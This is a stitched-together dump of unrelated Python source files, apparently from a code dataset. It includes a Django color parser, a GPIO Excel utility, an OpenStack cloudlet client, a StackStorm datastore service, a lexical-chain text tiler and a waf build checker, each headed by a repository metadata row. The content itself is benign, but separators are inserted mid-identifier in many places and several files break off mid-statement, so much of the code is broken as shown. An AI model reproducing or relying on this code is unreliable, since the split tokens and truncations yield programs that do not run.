DEFAULT_PALETTE = DARK_PALETTE
def parse_color_setting(config_string):
"""Parse a DJANGO_COLORS environment variable to produce the system palette
The general form of a pallete definition is:
"palette;role=fg;role=fg/bg;role=fg,option,option;role=fg/bg,option,option"
where:
palette is a named palette; one of 'light', 'dark', or 'nocolor'.
role is a named style used by Django
fg is a background color.
bg is a background color.
option is a display options.
Specifying a named palette is the same as manually specifying the individual
definitions for each role. Any individual definitions following the pallete
definition will augment the base palette definition.
Valid roles:
'error', 'notice', 'sql_field', 'sql_coltype', 'sql_keyword', 'sql_table',
'http_info', 'http_success', 'http_redirect', 'http_bad_request',
'http_not_found', 'http_server_error'
Valid colors:
'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white'
Valid options:
'bold', 'underscore', 'blink', 'reverse', 'conceal'
"""
if not config_string:
return PALETTES[DEFAULT_PALETTE]
# Split the color configuration into parts
parts = config_string.lower().split(';')
palette = PALETTES[NOCOLOR_PALETTE].copy()
for part in parts:
if part in PALETTES:
# A default palette has been specified
palette.update(PALETTES[part])
elif '=' in part:
# Process a palette defining string
definition = {}
# Break the definition into the role,
# plus the list of specific instructions.
# The role must be in upper case
role, instructions = part.split('=')
role = role.upper()
styles = instructions.split(',')
styles.reverse()
# | The first instruction c | an contain a slash
# to break apart fg/bg.
colors = styles.pop().split('/')
colors.reverse()
fg = colors.pop()
if fg in color_names:
definition['fg'] = fg
if colors and colors[-1] in color_names:
definition['bg'] = colors[-1]
# All remaining instructions are options
opts = tuple(s for s in styles if s in opt_dict.keys())
if opts:
definition['opts'] = opts
# The nocolor palette has all available roles.
# Use that palette as the basis for determining
# if the role is valid.
if role in PALETTES[NOCOLOR_PALETTE] and definition:
palette[role] = definition
# If there are no colors specified, return the empty palette.
if palette == PALETTES[NOCOLOR_PALETTE]:
return None
return palette
|
Always0806/GPIOTableGen | Util.py | Python | gpl-3.0 | 4,608 | 0.059245 | # encoding: utf-8
import sys
import os
import signal
from openpyxl.utils import get_column_letter
from openpyxl import Workbook,load_workbook
ItemList=[]
## {{{ http://code.activestate.com/recipes/410692/ (r8)
# This class provides the functionality we want. You only need to look at
# this if you want to know how this works. It only needs to be defined
# once, no need to muck around with its internals.
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
class Items:
def __init__(self, BallName,GPIO):
self.BallName = BallName
self.GPIO = GPIO
self.NetName = None
self.Direction = None
self.Data = None
self.Position = None
def set_NetName(self, NetName):
self.NetName=NetName
def set_Direction(self, Direction):
self.Direction=Direction
def set_Data(self, Data):
self.Data=Data
def set_Position(self, Position):
self.Position=Position
def GetCellValue(ws,index_row,column_letter):
return ws[column_letter+str(index_row)].value
def GetColumnNameAndChangeValue(ws,string_row,changelist,index_row):
string=[]
for i in range(0,len(changelist)):
column_letter = changelist[i]
string.append(str(GetCellValue(ws,string_row,column_letter))+' to ['+str(GetCellValue(ws,index_row,column_letter))+'] ')
return "".join(string)
def GetNumAndName(ws,index_row):
return '['+GetCellValue(ws,index_row,'D')+'] '+GetCellValue(ws,index_row,'C')+' : '
def GetColumnLetter(ws,string_row,string_value):
for column in range(1,40):
column_letter = get_column_letter(column)
if ws[column_letter+str(string_row)].value==string_value:
return column_letter
return None
def Get_Bit(byteval,idx):
return ((byteval&(1<<idx))!=0);
def AppendBit(data_L,data_M):
output_str=""
if data_L != 0:
for i in range(0, 8):
if Get_Bit(int(data_L,16),i) == True:
output_str=output_str+str(i)+"/"
if data_M != 0:
for i in range(0, 8):
if Get_Bit(int(data_M,16),i) == True:
output_str=output_str+str(i+8)+"/"
if data_L != 0 or data_M != 0:
output_str=output_str+"\n"
return output_str
def StringToSignint(string,len):
x = int(string,16)
if x > ((1<<(8*len))/2)-1:
x -= 1<<(8*len)
return x
def Exce | lToStruct(filename):
try:
wb = load_workbook(filename)
except IOError:
print ("Can't open file exit")
sys.exit(0)
ws = wb.active
index_row=2
print ("clear All data in excel")
tmp_row=index_row
while True:
BallName=ws[GetColumnLetter(ws,1,'BallName')+str(tmp_row)].value
if BallName==None:
break;
for row in ws['C'+str(tmp_row)+':G'+str | (tmp_row)]:
for cell in row:
cell.value = None
tmp_row = tmp_row+1;
while True:
BallName=ws[GetColumnLetter(ws,1,'BallName')+str(index_row)].value
if BallName==None:
break;
GPIOPPin=ws[GetColumnLetter(ws,1,'GPIO')+str(index_row)].value
if GPIOPPin!=None:
ItemList.append(Items(BallName,GPIOPPin))
index_row = index_row+1;
wb.save(filename)
def StructToExcel(filename):
try:
wb = load_workbook(filename)
except IOError:
print ("Can't open file exit")
sys.exit(0)
ws = wb.active
index_row=2
while True:
BallName=ws[GetColumnLetter(ws,1,'BallName')+str(index_row)].value
if BallName==None:
break;
for item in ItemList:
if item.BallName!=None and item.NetName !=None and BallName.strip() == item.BallName.strip():
ws[GetColumnLetter(ws,1,'NetName')+str(index_row)] = item.NetName
index_row = index_row+1;
wb.save(filename)
def FindBallNameAppend(BallName,Position):
for item in ItemList:
if BallName.strip() == item.BallName.strip():
item.set_Position(Position)
def FindPositionAppend(Position,SIG_NAME):
if SIG_NAME.find("\g")!=-1:
return
for item in ItemList:
if xstr(Position).strip() == xstr(item.Position).strip():
item.set_NetName(SIG_NAME)
def xstr(s):
if s is None:
return ''
return str(s)
def CheckEmptyNetName():
for item in ItemList:
if item.NetName is None:
item.set_NetName("NOT_CONNECT_"+item.GPIO[4:])
def PrintItemList():
for item in ItemList:
print (xstr(item.BallName)+" "+xstr(item.GPIO)+" "+xstr(item.Position)+" "+xstr(item.NetName))
|
wkerzendorf/tardis | tardis/plasma/properties/property_collections.py | Python | bsd-3-clause | 1,533 | 0.00848 | from tardis.plasma.properties import *
class PlasmaPropertyCollection(list):
pass
basi | c_inputs = PlasmaPropertyCollection([TRadiative, Abundance, Density,
TimeExplosion, AtomicData, JBlues, DilutionFactor, LinkTRadTElectron,
RadiationFieldCorrectionInput, NLTESpecies, PreviousBetaSobolev,
PreviousElectronDensities])
basic_properties = PlasmaPropertyCollection([BetaRadiation,
Levels, Lines, AtomicMass, PartitionFunction,
GElectron, IonizationData, NumberDensity, LinesLowerLevelI | ndex,
LinesUpperLevelIndex, TauSobolev, LevelNumberDensity, IonNumberDensity,
StimulatedEmissionFactor, SelectedAtoms, ElectronTemperature])
lte_ionization_properties = PlasmaPropertyCollection([PhiSahaLTE])
lte_excitation_properties = PlasmaPropertyCollection([LevelBoltzmannFactorLTE])
macro_atom_properties = PlasmaPropertyCollection([BetaSobolev,
TransitionProbabilities])
nebular_ionization_properties = PlasmaPropertyCollection([PhiSahaNebular,
ZetaData, BetaElectron, RadiationFieldCorrection, Chi0])
dilute_lte_excitation_properties = PlasmaPropertyCollection([
LevelBoltzmannFactorDiluteLTE])
non_nlte_properties = PlasmaPropertyCollection([LevelBoltzmannFactorNoNLTE])
nlte_properties = PlasmaPropertyCollection([
LevelBoltzmannFactorNLTE, NLTEData, NLTESpecies, LTEJBlues])
helium_nlte_properties = PlasmaPropertyCollection([HeliumNLTE,
RadiationFieldCorrection, ZetaData,
BetaElectron, Chi0])
helium_numerical_nlte_properties = PlasmaPropertyCollection([
HeliumNumericalNLTE])
|
cmusatyalab/elijah-openstack | client/cloudlet_client.py | Python | apache-2.0 | 36,615 | 0.000819 | #!/usr/bin/env python
# Elijah: Cloudlet Infrastructure for Mobile Computing
#
# Author: Kiryong Ha <krha@cmu.edu>
#
# Copyright (C) 2011-2014 Carnegie Mellon University
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import os
import httplib
import json
import math
import subprocess
import urllib
from pprint import pprint
from optparse import OptionParser
from urlparse import urlparse
from tempfile import mkdtemp
from client_util import CLOUDLET_TYPE
from client_util import CLOUDLET_COMMAND
from client_util import find_matching_flavor
from client_util import get_resource_size
from client_util import create_flavor
from elijah.provisioning.package import PackagingUtil
from elijah.provisioning.package import _FileFile
import elijah.provisioning.memory_util as elijah_memory_util
from elijah.provisioning.package import BaseVMPackage
import glanceclient as glance_client
import zipfile
import shutil
class CloudletClientError(Exception):
pass
def get_list(server_address, token, end_point, request_list):
if not request_list in ('images', 'flavors', 'extensions', 'servers'):
sys.stderr.write(
"Error, Cannot support listing for %s\n" %
request_list)
sys.exit(1)
params = urllib.urlencode({})
headers = {"X-Auth-Token": token, "Content-type": "application/json"}
if request_list == 'extensions':
end_string = "%s/%s" % (end_point[2], request_list)
else:
end_string = "%s/%s/detail" % (end_point[2], request_list)
# HTTP response
conn = httplib.HTTPConnection(end_point[1])
conn.request("GET", end_string, params, headers)
response = conn.getresponse()
data = response.read()
dd = json.loads(data)
conn.close()
return dd[request_list]
def request_synthesis(server_address, token, end_point, key_name=None,
server_name=None, overlay_url=None):
# read meta data from vm overlay URL
from elijah.provisioning.package import VMOverlayPackage
try:
from elijah.provisioning import msgpack
except ImportError as e:
import msgpack
overlay_package = VMOverlayPackage(overlay_url)
meta_raw = overlay_package.read_meta()
meta_info = msgpack.unpackb(meta_raw)
requested_basevm_id = meta_info['base_vm_sha256']
# find matching base VM
image_list = get_list(server_address, token, end_point, "images")
basevm_uuid = None
basevm_xml = None
basevm_name = None
basevm_disk = 0
for image in image_list:
properties = image.get("metadata", None)
if properties is None or len(properties) == 0:
continue
if properties.get(CLOUDLET_TYPE.PROPERTY_KEY_CLOUDLET_TYPE) != \
CLOUDLET_TYPE.IMAGE_TYPE_BASE_DISK:
continue
base_sha256_uuid = properties.get(CLOUDLET_TYPE.PROPERTY_KEY_BASE_UUID)
if base_sha256_uuid == requested_basevm_id:
basevm_uuid = image['id']
basevm_name = image['name']
basevm_xml = properties.get(
CLOUDLET_TYPE.PROPERTY_KEY_BASE_RESOURCE,
None)
basevm_disk = image.get('minDisk', 0)
break
if basevm_uuid is None:
raise CloudletClientError("Cannot find matching Base VM with (%s)" %
str(requested_basevm_id))
# find matching flavor.
if basevm_xml is None:
msg = "Cannot find resource allocation information of base VM (%s)" %\
| str(requested_basevm_id)
raise CloudletClientError(msg)
cpu_count, memory_mb = get_resource_size(basevm_xml)
flavor_list = get_list(server_address, token, end_point, "flavors")
flavor_ref, flavor_id = find_matching_flavor(flavor_list, cpu_count,
memory_mb, basevm_disk)
if flavor_ref == None or flavor_id | == None:
msg = "Cannot find matching flavor: vcpu (%d), ram (%d MB), disk (%d GB)\n" % (
cpu_count, memory_mb, basevm_disk)
msg += "Please create the matching at your OpenStack"
raise CloudletClientError(msg)
# generate request
meta_data = {"overlay_url": overlay_url}
s = {
"server": {
"name": server_name, "imageRef": str(basevm_uuid),
"flavorRef": flavor_id, "metadata": meta_data,
"min_count": "1", "max_count": "1",
"key_name": key_name,
}}
params = json.dumps(s)
headers = {"X-Auth-Token": token, "Content-type": "application/json"}
conn = httplib.HTTPConnection(end_point[1])
conn.request("POST", "%s/servers" % end_point[2], params, headers)
sys.stdout.write("request new server: %s/servers\n" % (end_point[2]))
response = conn.getresponse()
data = response.read()
dd = json.loads(data)
conn.close()
return dd
def _request_handoff_recv(server_address, token, end_point,
server_name=None, overlay_url=None):
"""Test for handoff receving"""
# read meta data from vm overlay URL
from elijah.provisioning.package import VMOverlayPackage
try:
from elijah.provisioning import msgpack
except ImportError as e:
import msgpack
overlay_package = VMOverlayPackage(overlay_url)
meta_raw = overlay_package.read_meta()
meta_info = msgpack.unpackb(meta_raw)
requested_basevm_id = meta_info['base_vm_sha256']
# find matching base VM
image_list = get_list(server_address, token, end_point, "images")
basevm_uuid = None
basevm_xml = None
basevm_name = None
basevm_disk = 0
for image in image_list:
properties = image.get("metadata", None)
if properties is None or len(properties) == 0:
continue
if properties.get(CLOUDLET_TYPE.PROPERTY_KEY_CLOUDLET_TYPE) != \
CLOUDLET_TYPE.IMAGE_TYPE_BASE_DISK:
continue
base_sha256_uuid = properties.get(CLOUDLET_TYPE.PROPERTY_KEY_BASE_UUID)
if base_sha256_uuid == requested_basevm_id:
basevm_uuid = image['id']
basevm_name = image['name']
basevm_xml = properties.get(
CLOUDLET_TYPE.PROPERTY_KEY_BASE_RESOURCE,
None)
basevm_disk = image.get('minDisk', 0)
break
if basevm_uuid is None:
raise CloudletClientError(
"Cannot find matching Base VM with (%s)" %
str(requested_basevm_id))
# find matching flavor
if basevm_xml is None:
msg = "Cannot find resource allocation information of base VM (%s)" %\
str(requested_basevm_id)
raise CloudletClientError(msg)
cpu_count, memory_mb = get_resource_size(basevm_xml)
flavor_list = get_list(server_address, token, end_point, "flavors")
flavor_ref, flavor_id = find_matching_flavor(flavor_list, cpu_count,
memory_mb, basevm_disk)
if flavor_ref == None or flavor_id == None:
msg = "Cannot find matching flavor with vcpu:%d, ram:%d, disk:%d\n" % (
cpu_count, memory_mb, basevm_disk)
msg += "Please create one at your OpenStack"
raise CloudletClientError(msg)
# generate request
meta_data = {"handoff_info": overlay_url}
s = {"server":
{
"name": server_name, "imageRef": str(basevm_uuid),
"flavorRef": flavor_id, "metadata": meta_data,
"min_count": "1", "max_count": "1",
"key_name": None,
}
}
params = json.dumps(s)
headers = {"X-Auth-Token": token, "Content-type": "application/json"}
conn |
weissj3/MWTools | Scripts/MakeTableResultsandErrors.py | Python | mit | 1,034 | 0.005803 | import sys
params = open(sys.argv[1], 'r')
errors = open(sys.argv[2], 'r')
error = []
for line in errors:
if len(line) < 5: continue
error.append(map(float, line.replace('[', '').replace(']', '').split(',')))
print error
output = []
count = 0
paramCount = 0
roundValues = [4, 2, 2, 1, 1, 2, 2, 1, 2, 1, 1, 2, 2, 1, 2, 1, 1, 2, 2, 1]
for line in params:
out = ""
ln = line.replace(' ', '').split(",")
for i in range(len(ln)):
if ln[i] == '\n': continue
out += "$" + str(rou | nd(float(ln[i]), roundValues[paramCount])) + "\pm" + str(round(error[count][paramCount], roundValues[paramCount])) + "$ & "
paramCount += 1
output.append(out[0:len(out)-3])
# print out[0:len(out)-3]
if paramCount == 20:
count += 1
paramCount = 0
for i in output:
print i
wedge = range(9,24)
for i in range(4):
count = 0
for j in range(len(output)/5 + 1):
| print str(wedge[count]) + " & " + output[j*5+i] + " \\\\"
print "\hline"
count += 1
print ""
|
tonybaloney/st2 | st2common/st2common/services/datastore.py | Python | apache-2.0 | 8,753 | 0.001828 | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import timedelta
from st2client.client import Client
from st2client.models import KeyValuePair
from st2common.services.access import create_token
from st2common.util.api import get_full_public_api_url
from st2common.util.date import get_datetime_utc_now
from st2common.constants.keyvalue import DATASTORE_KEY_SEPARATOR, SYSTEM_SCOPE
class DatastoreService(object):
"""
Class provides public methods for accessing datastore items.
"""
DATASTORE_NAME_SEPARATOR = DATASTORE_KEY_SEPARATOR
def __init__(self, logger, pack_name, class_name, api_username):
self._api_username = api_username
self._pack_name = pack_name
self._class_name = class_name
self._logger = logger
self._client = None
self._token_expire = get_datetime_utc_now()
##################################
# Methods for datastore management
##################################
def list_values(self, local=True, prefix=None):
"""
Retrieve all the datastores items.
:param local: List values from a namespace local to this pack/class. Defaults to True.
:type: local: ``bool``
:param prefix: Optional key name prefix / startswith filter.
:type prefix: ``str``
:rtype: ``list`` of :class:`KeyValuePair`
"""
client = self._get_api_client()
self._logger.audit('Retrieving all the value from the datastore')
key_prefix = self._get_full_key_prefix(local=local, prefix=prefix)
kvps = client.keys.get_all(prefix=key_prefix)
return kvps
def get_value(self, name, local=True, scope=SYSTEM_SCOPE, decrypt=False):
"""
Retrieve a value from the datastore for the provided key.
By default, value is retrieved from the namespace local to the pack/class. If you want to
retrieve a global value from a datastore, pass local=False to this method.
:param name: Key name.
:type name: ``str``
:param local: Retrieve valu | e from a namespace local to the pack/class. Defaults to True.
:type: local: ``bool``
:param scope: Scope under which item is sa | ved. Defaults to system scope.
:type: local: ``str``
:param decrypt: Return the decrypted value. Defaults to False.
:type: local: ``bool``
:rtype: ``str`` or ``None``
"""
if scope != SYSTEM_SCOPE:
raise ValueError('Scope %s is unsupported.' % scope)
name = self._get_full_key_name(name=name, local=local)
client = self._get_api_client()
self._logger.audit('Retrieving value from the datastore (name=%s)', name)
try:
params = {'decrypt': str(decrypt).lower(), 'scope': scope}
kvp = client.keys.get_by_id(id=name, params=params)
except Exception as e:
self._logger.exception(
'Exception retrieving value from datastore (name=%s): %s',
name,
e
)
return None
if kvp:
return kvp.value
return None
def set_value(self, name, value, ttl=None, local=True, scope=SYSTEM_SCOPE, encrypt=False):
"""
Set a value for the provided key.
By default, value is set in a namespace local to the pack/class. If you want to
set a global value, pass local=False to this method.
:param name: Key name.
:type name: ``str``
:param value: Key value.
:type value: ``str``
:param ttl: Optional TTL (in seconds).
:type ttl: ``int``
:param local: Set value in a namespace local to the pack/class. Defaults to True.
:type: local: ``bool``
:param scope: Scope under which to place the item. Defaults to system scope.
:type: local: ``str``
:param encrypt: Encrypt the value when saving. Defaults to False.
:type: local: ``bool``
:return: ``True`` on success, ``False`` otherwise.
:rtype: ``bool``
"""
if scope != SYSTEM_SCOPE:
raise ValueError('Scope %s is unsupported.', scope)
name = self._get_full_key_name(name=name, local=local)
value = str(value)
client = self._get_api_client()
self._logger.audit('Setting value in the datastore (name=%s)', name)
instance = KeyValuePair()
instance.id = name
instance.name = name
instance.value = value
instance.scope = scope
if encrypt:
instance.secret = True
if ttl:
instance.ttl = ttl
client.keys.update(instance=instance)
return True
def delete_value(self, name, local=True, scope=SYSTEM_SCOPE):
"""
Delete the provided key.
By default, value is deleted from a namespace local to the pack/class. If you want to
delete a global value, pass local=False to this method.
:param name: Name of the key to delete.
:type name: ``str``
:param local: Delete a value in a namespace local to the pack/class. Defaults to True.
:type: local: ``bool``
:param scope: Scope under which item is saved. Defaults to system scope.
:type: local: ``str``
:return: ``True`` on success, ``False`` otherwise.
:rtype: ``bool``
"""
if scope != SYSTEM_SCOPE:
raise ValueError('Scope %s is unsupported.', scope)
name = self._get_full_key_name(name=name, local=local)
client = self._get_api_client()
instance = KeyValuePair()
instance.id = name
instance.name = name
self._logger.audit('Deleting value from the datastore (name=%s)', name)
try:
params = {'scope': scope}
client.keys.delete(instance=instance, params=params)
except Exception as e:
self._logger.exception(
'Exception deleting value from datastore (name=%s): %s',
name,
e
)
return False
return True
def _get_api_client(self):
"""
Retrieve API client instance.
"""
token_expire = self._token_expire <= get_datetime_utc_now()
if not self._client or token_expire:
self._logger.audit('Creating new Client object.')
ttl = (24 * 60 * 60)
self._token_expire = get_datetime_utc_now() + timedelta(seconds=ttl)
temporary_token = create_token(username=self._api_username, ttl=ttl)
api_url = get_full_public_api_url()
self._client = Client(api_url=api_url, token=temporary_token.token)
return self._client
def _get_full_key_name(self, name, local):
"""
Retrieve a full key name.
:rtype: ``str``
"""
if local:
name = self._get_key_name_with_prefix(name=name)
return name
def _get_full_key_prefix(self, local, prefix=None):
if local:
key_prefix = self._get_local_key_name_prefix()
if prefix:
key_prefix += prefix
else:
key_prefix = prefix
return key_prefix
def _get_local_key_name_prefix(self):
"""
Retrieve key prefix which is local to this pack/class.
"""
key_prefix = self._get_datastore_key_prefix() |
cligu/compdisc | lexical_chains.py | Python | apache-2.0 | 6,335 | 0.004893 | """
lexical chain module for text tiling
"""
from tile_reader import TileReader
from scoring import boundarize, depth_scoring, window_diff
# ======================================================================================================================
# Main
# ======================================================================================================================
class LexicalChains(object):
def __init__(self):
self.sentences = []
self.actives = {}
self.gap_scores = []
self.boundary_vector = []
def analyze(self, sents, window=4, pos_filter=('PUNCT', 'SYM', 'SPACE', 'DET'), boundary_type='liberal'):
"""
Set attributes
:param sents: (list) spacy-analyzed sentences
:param window: (int) distance threshold within which chains are considered active
:param boundary_type: (str) 'liberal' or 'conservative' boundary scoring
:param pos_filter: (tuple) spacy pos_ labels to exclude (i.e. a pos-based stoplist)
:return: void
"""
self.sentences = self._preproc(sents, pos_filter)
self.actives = self._get_actives(self.sentences, window)
self.gap_scores = [len(self.actives[k]) for k in self.actives.keys()]
self.boundary_vector = self._get_boundaries(self.gap_scores, boundary_type)
@staticmethod
def _preproc(sentences, pos_filter):
"""
Filters out stop POSs and lemmatizes sentences
:param sentences: list of tokenized sentences in doc
:param pos_filter: tuple of spacy pos_ labels to filter out
:return: list
"""
filtered = [[tok for tok in sent if tok.pos_ not in pos_filter] for sent in sentences]
lemmatized = [[tok.lemma_ for tok in sent] for sent in filtered]
return lemmatized
@staticmethod
def _get_actives(sents, window):
"""
Get active lexical chains for each gap between sentences
:param sents: list of tokenized sentences
:param window: difference threshold over which lexical chains are considered active
:return: dictionary containing active lexical chains for each sentence transition
"""
# initialize active chains dictionary
actives = {}
for i in xrange(len(sents)-1):
actives[i] = set()
# loop over all sentences
for sent in sents:
# get index and unique tokens from current sentence
i = sents.index(sent)
uniques_i = set(sent)
# loop over all sentences within dist thresh of current
for diff in xrange(window, 0, -1):
# back off diff when there are less sentences left than dist thresh
while not i + diff < len(sents):
diff -= 1
# find shared tokens between current sent[i] and sent[i+diff]
n = i + diff
uniq | ues_n = set(sents[n])
intersection = uniques_i.intersection(uniques_n)
# add the intersections to all affected transitions between sent[i] and sent[i+diff]
for k in list(xrange(diff)):
| [actives[i+k].add(word) for word in intersection]
return actives
@staticmethod
def _get_boundaries(scores, boundary_type):
"""
Calculate boundaries from gap scores
:param scores: list containing # of active chains across each sentence gap in doc
:param boundary_type: string indicating 'liberal' or 'conservative' boundary scoring
:return: list indicating which sentences in doc constitute beginnings of new topic tiles
"""
d_scores = depth_scoring(scores)
boundaries = boundarize(d_scores, type=boundary_type)
boundary_vector = [1] + [0 if i not in boundaries else 1 for i in xrange(len(scores))]
return boundary_vector
# ======================================================================================================================
# Test if invoked directly
# ======================================================================================================================
if __name__ == "__main__":
from decimal import Decimal
import matplotlib.pyplot as plt
import sys
import os
# set doc
try:
doc = sys.argv[1]
except IndexError:
sys.exit("ERROR: Expected 1 arg, got {}\nUsage: (python) lexical_chains.py <docname> <docpath>".format(
len(sys.argv)-1))
# get doc path
path = os.path.dirname(__file__)
if doc in ('coron','athens','chatham','cuba','merida'):
doc_path = os.path.join(path, os.path.join("data", "GUM_voyage_{}_noheads.txt".format(doc)))
else:
raise ValueError("unrecognized document: {}".format(doc))
# get gold
gold_file = os.path.join(path, os.path.join("data", "GUM_5_gold_tiles.txt"))
with open(gold_file) as f:
boundaries = [[int(x) for x in line.split(",")] for line in f.read().split()]
texts = ["athens", "chatham", "coron", "cuba", "merida"]
gold_dict = dict(zip(texts, boundaries))
gold = gold_dict[doc]
# Instantiate TileReader
reader = TileReader()
reader.read(doc_path, newline_tokenization=True)
sents = reader.sentences
# Instantiate Lexical Chains
chains = LexicalChains()
chains.analyze(sents)
# compare gold and predicted boundaries
print "GOLD: {}".format(gold)
print "MINE: {}".format(chains.boundary_vector)
# get window_diff
window_size = len(gold)/4
wdiff = window_diff(chains.boundary_vector, gold, window_size)
print "Window Diff: {}".format(wdiff)
# Plot scores
scores = [0] + chains.gap_scores
plt.plot([x for x in xrange(len(scores))], scores)
for index, grp in enumerate(zip(gold, chains.boundary_vector)):
if 1 == grp[0] == grp[1]:
plt.axvline(x=index, color = 'green', linewidth='2.0')
elif 1 == grp[0] != grp[1]:
plt.axvline(x=index, color = 'red')
elif 1 == grp[1] != grp[0]:
plt.axvline(x=index, color = 'gray')
ymin, ymax = plt.ylim()
xmin, xmax = plt.xlim()
wdiff_rounded = round(Decimal(wdiff), 3)
plt.text(xmax-(xmax-xmin)/4,ymax+0.5, "window diff: {}".format(wdiff_rounded))
plt.show()
|
costibleotu/czl-scrape | sanatate/scrapy_proj/helpers/__init__.py | Python | mpl-2.0 | 147 | 0 | # -*- coding: utf-8 -*-
from scrapy_proj.helpers.leg | al import *
from scrapy_proj.helpers.romanian import *
from sc | rapy_proj.helpers.text import *
|
softDi/clusim | ns3/ns-3.26/.waf-1.8.19-b1fc8f7baef51bd2db4c2971909a568d/waflib/Tools/errcheck.py | Python | apache-2.0 | 6,003 | 0.06047 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! https://waf.io/book/index.html#_obtaining_the_waf_file
typos={'feature':'features','sources':'source','targets':'target','include':'includes','export_include':'export_includes','define':'defines','importpath':'includes','installpath':'install_path','iscopy':'is_copy',}
meths_typos=['__call__','program','shlib','stlib','objects']
import sys
from waflib import Logs,Build,Node,Task,TaskGen,ConfigSet,Errors,Utils
import waflib.Tools.ccroot
def check_same_targets(self):
mp=Utils.defaultdict(list)
uids={}
def check_task(tsk):
if not isinstance(tsk,Task.Task):
return
for node in tsk.outputs:
mp[node].append(tsk)
try:
uids[tsk.uid()].append(tsk)
except KeyError:
uids[tsk.uid()]=[tsk]
for g in self.groups:
for tg in g:
try:
for tsk in tg.tasks:
check_task(tsk)
except AttributeError:
check_task(tg)
dupe=False
for(k,v)in mp.items():
if len(v)>1:
dupe=True
msg='* Node %r is created more than once%s. The task generators are:'%(k,Logs.verbose==1 and" (full message on 'waf -v -v')"or"")
Logs.error(msg)
for x in v:
if Logs.verbose>1:
Logs.error(' %d. %r'%(1+v.index(x),x.generator))
else:
Logs.error(' %d. %r in %r'%(1+v.index(x),x.generator.name,getattr(x.generator,'path',None)))
if not dupe:
for(k,v)in uids.items():
if len(v)>1:
Logs.error('* Several tasks use the same identifier. Please check the information on\n https://waf.io/apidocs/Task.html?highlight=uid#waflib.Task.Task.uid')
for tsk in v:
Logs.error(' - object %r (%r) defined in %r'%(tsk.__class__.__name__,tsk,tsk.generator))
def check_invalid_constraints(self):
feat=set([])
for x in list(TaskGen.feats.values()):
feat.union(set(x))
for(x,y)in TaskGen.task_gen.prec.items():
feat.add(x)
feat.union(set(y))
ext=set([])
for x in TaskGen.task_gen.mappings.values():
ext.add(x.__name__)
invalid=ext&feat
if invalid:
Logs.error('The methods %r have invalid annotations: @extension <-> @feature/@before_method/@after_method'%list(invalid))
for cls in list(Task.classes.values()):
if sys.hexversion>0x3000000 and issubclass(cls,Task.Task)and isinstance(cls.hcode,str):
raise Errors.WafError('Class %r has hcode value %r of type <str>, expecting <bytes> (use Utils.h_cmd() ?)'%(cls,cls.hcode))
for x in('before','after'):
for y in Utils.to_list(getattr(cls,x,[])):
if not Task.classes.get(y,None):
Logs.error('Erroneous order constraint %r=%r on task class %r'%(x,y,cls.__name__))
if getattr(cls,'rule',None):
Logs.error('Erroneous attribute "rule" on task class %r (rename to "run_str")'%cls.__name__)
def replace(m):
oldcall=getattr(Build.BuildContext,m)
def call(self,*k,**kw):
ret=oldcall(self,*k,**kw)
for x in typos:
if x in kw:
if x=='iscopy'and'subst'in getattr(self,'features',''):
continue
Logs.error('Fix the typo %r -> %r on %r'%(x,typos[x],ret))
return ret
setattr(Build.BuildContext,m,call)
def enhance_lib():
for m in meths_typos:
replace(m)
def ant_glob(self,*k,**kw):
if k:
lst=Utils.to_list(k[0])
for pat in lst:
if'..'in pat.split('/'):
Logs.error("In ant_glob pattern %r: '..' means 'two dots', not 'parent directory'"%k[0])
if kw.get('remove',True):
try:
if self.is_child_of(self.ctx.bldnode)and not kw.get('quiet',False):
Logs.error('Using ant_glob on the build folder (%r) is dangerous (quiet=True to disable this warning)'%self)
except AttributeError:
pass
return self.old_ant_glob(*k,**kw)
Node.Node.old_ant_glob=Node.Node.ant_glob
Node.Node.ant_glob=ant_glob
old=Task.is_before
def is_before(t1,t2):
ret=old(t1,t2)
if ret and old(t2,t1):
Logs.error('Contradictory order constraints in classes %r %r'%(t1,t2))
return ret
Task.is_before=is_before
def check_err_features(self):
lst=self.to_list(self.features)
if'shlib'in lst:
Logs.error('feature shlib -> cshlib, dshlib or cxxshlib') |
for x in('c','cxx','d','fc'):
if not x in lst and lst and lst[0]in[x+y for y in('program','shlib','stlib')]:
Logs.error('%r features is probably missing %r'%(self,x))
TaskGen.feature('*')(check_err_features)
def check_err_order(self):
if not hasattr(self,'rule')and not'subst'in Utils.to_list(self.features):
for x in('before','after','ext_in','ext_out'):
if hasattr(self,x):
Logs.warn('Erroneous o | rder constraint %r on non-rule based task generator %r'%(x,self))
else:
for x in('before','after'):
for y in self.to_list(getattr(self,x,[])):
if not Task.classes.get(y,None):
Logs.error('Erroneous order constraint %s=%r on %r (no such class)'%(x,y,self))
TaskGen.feature('*')(check_err_order)
def check_compile(self):
check_invalid_constraints(self)
try:
ret=self.orig_compile()
finally:
check_same_targets(self)
return ret
Build.BuildContext.orig_compile=Build.BuildContext.compile
Build.BuildContext.compile=check_compile
def use_rec(self,name,**kw):
try:
y=self.bld.get_tgen_by_name(name)
except Errors.WafError:
pass
else:
idx=self.bld.get_group_idx(self)
odx=self.bld.get_group_idx(y)
if odx>idx:
msg="Invalid 'use' across build groups:"
if Logs.verbose>1:
msg+='\n target %r\n uses:\n %r'%(self,y)
else:
msg+=" %r uses %r (try 'waf -v -v' for the full error)"%(self.name,name)
raise Errors.WafError(msg)
